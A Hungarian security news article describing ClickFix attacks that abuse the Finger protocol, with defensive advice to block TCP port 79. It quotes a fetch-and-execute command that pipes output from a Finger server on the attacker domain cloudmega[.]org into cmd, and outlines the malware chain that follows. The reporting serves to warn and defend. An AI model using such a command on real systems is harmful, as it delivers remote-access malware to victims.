Régi parancs, új veszélyek
A Finger protokollt eredetileg arra használták, hogy helyi vagy távoli felhasználók adatait, például felhasználónevet, utolsó aktivitást vagy elérhetőségeket jelenítsen meg Unix, majd Windows rendszereken is. Bár a finger parancs ma már szinte alig használatos, a támogatása megmaradt. Ez a sebezhetőség most támadási felületté vált: kiberbűnözők ClickFix néven emlegetett trükkel arra veszik rá az embereket, hogy engedélyezzenek rosszindulatú parancsfuttatást saját gépükön.
A ClickFix trükk működése
Más szóval, a támadó kihasználja, hogy az áldozat követ egy utasítást, például egy CAPTCHA-ablaknak tűnő ellenőrzést, amely valójában a Windows parancssor futtatására kér. A finger <felhasználó>@finger.cloudmega[.]org | cmd parancs egy internetes Finger-kiszolgálóról kér le utasításokat, majd azokat Windows rendszeren azonnal végre is hajtja. A letöltött parancs egy véletlenszerű nevű mappát hoz létre, ahová átmásolja a curl.exe programot új néven, majd egy ZIP-fájlt tölt le a cloudmega[.]org-ról, PDF-nek álcázva, és ebből Python-alapú kártevőt csomagol ki a gépre. Végül visszajelző parancsot küld a szervernek, miközben az áldozatnak csak egy újabb „igazolja, hogy ember” ablakot jelenít meg.
Folyamatosan fejlődő támadások
Továbbá hasonló támadásokat észleltek más domainekről is, például az api.metrics-strange.com-ról. Ezek a parancsok már olyan eszközöket is keresnek a gépeken, amelyeket malwareelemzők vagy rendszergazdák használnak (pl. Procmon, Wireshark, Fiddler, x64dbg), és ha ilyenekre bukkannak, a támadás leáll. Amennyiben nem észlelnek védelmi eszközt, a rendszerre egy NetSupport Manager nevű, távoli hozzáférést biztosító kártevőt telepítenek, amelyet ütemezett feladatként minden bejelentkezéskor elindítanak.
Hogyan védekezhetsz?
A támadás fő célja, hogy a felhasználótól minimális együttműködéssel rendszergazdai jogosultságot szerezzenek, kikerülve az ismert vírusvédelmi rendszereket. A védekezés legbiztosabb módja a Finger protokollt használó 79-es TCP-port internet felőli elérésének blokkolása, hiszen ezen keresztül futnak a rosszindulatú parancsok. Az ilyen, rég elfeledett protokollokat mindig érdemes időben letiltani, hiszen a támadók nem felejtenek.
